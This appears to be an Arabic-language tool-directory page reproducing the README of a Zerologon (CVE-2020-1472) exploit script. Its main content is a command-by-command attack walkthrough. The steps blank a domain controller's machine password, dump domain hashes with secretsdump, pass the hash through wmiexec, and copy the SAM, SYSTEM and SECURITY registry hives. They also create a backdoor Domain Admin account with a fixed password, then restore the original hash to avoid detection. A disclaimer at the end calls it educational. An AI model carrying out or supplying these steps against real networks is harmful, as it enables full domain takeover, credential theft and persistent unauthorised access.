Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
zerologon — سكربت zerologon لاستغلال CVE-2020-1472 بمعدل CVSS 10/10 | Kitploit
أدوات/GitHubGitHub/wrathfuldiety/zerologon
كسر كلمات المرورتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةما بعد الاستغلالاختبار الاختراقالتعلم والتعليم
GitHubwrathfuldiety/zerologon

zerologon

سكربت zerologon لاستغلال CVE-2020-1472 بمعدل CVSS 10/10

عرض المستودع
2منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

zerologon

سكربت zerologon لاستغلال CVE-2020-1472 CVSS 10/10 الكود البرمجي للاستغلال مبني على https://www.secura.com/blog/zero-logon و https://github.com/SecuraBV/CVE-2020-1472. البحث الأصلي والماسح الضوئي من قبل Secura، مع تعديلات من RiskSense Inc. https://github.com/risksense/zerologon

لاستغلال الثغرة، قم بإزالة أي تثبيتات سابقة لـ Impacket لديك وقم بتثبيت Impacket من https://github.com/SecureAuthCorp/impacket/commit/b867b21 أو إصدار أحدث.

apt update

apt remove --purge impacket-scripts python3-impacket apt autoremove

git clone https://github.com/rthalley/dnspython.git sudo python3 setup.py install cd .. git clone https://github.com/SecureAuthCorp/impacket.git cd impacket sudo python3 setup.py install git clone

ثم قم بما يلي:

python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR

إذا نجح ذلك، فستتمكن بعدها من:

sudo secretsdump.py -just-dc domain/hostname\$@ip

الضغط على "Enter" عند طلب كلمة المرور سيمرر لك، وهو ما يجب أن يمنحك تجزئة مسؤول المجال Domain Admin hash. بعد الحصول على ذلك، استخدم wmiexec.py للاتصال بخادم المجال الهدف باستخدام بيانات اعتماد من secretsdump

wmiexec.py domain/Administrator@ip -hashes hash

وقم بـ:

reg save HKLM\SYSTEM system.save
get system.save
del /f system.save

reg save HKLM\SAM sam.save
get sam.save
del /f sam.save

reg save HKLM\SECURITY security.save
get security.save
del /f security.save

وبعد ذلك يمكنك إنشاء حساب Admin جديد كإجراء احتياطي،

net user myadmin Hello1234 /ADD /DOMAIN

وقم بإضافة الحساب الجديد إلى مجموعة Domain Admins للحصول على صلاحيات كاملة،

net group "Domain Admins" myadmin /ADD /DOMAIN

وربما اكتب exit الآن من موجه C:>

ثم يمكنك تشغيل

sudo secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

وهذا يجب أن يعرض لك تجزئة NT الأصلية لحساب الجهاز. يمكنك بعد ذلك إعادة تثبيت تجزئة حساب الجهاز الأصلية تلك إلى المجال عبر

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH

إعادة تثبيت التجزئة الأصلية ضرورية لكي يستمر خادم المجال DC في العمل بشكل طبيعي.

وللتأكد فقط من أن عملية الاستعادة نجحت،

sudo secretsdump.py -just-dc domain/hostname\$@ip

ولن يعود الضغط على "Enter" عند طلب كلمة المرور يعمل بعد الآن.

وبهذا نكون انتهينا هنا.

صيدًا سعيدًا.

إخلاء مسؤولية: هذا لأغراض تعليمية بحتة، ولن أتحمل أي مسؤولية عن أي أفعال أو عواقبها. اختراق جهاز شخص آخر غير قانوني ويعاقب عليه القانون.

تنزيل الأداة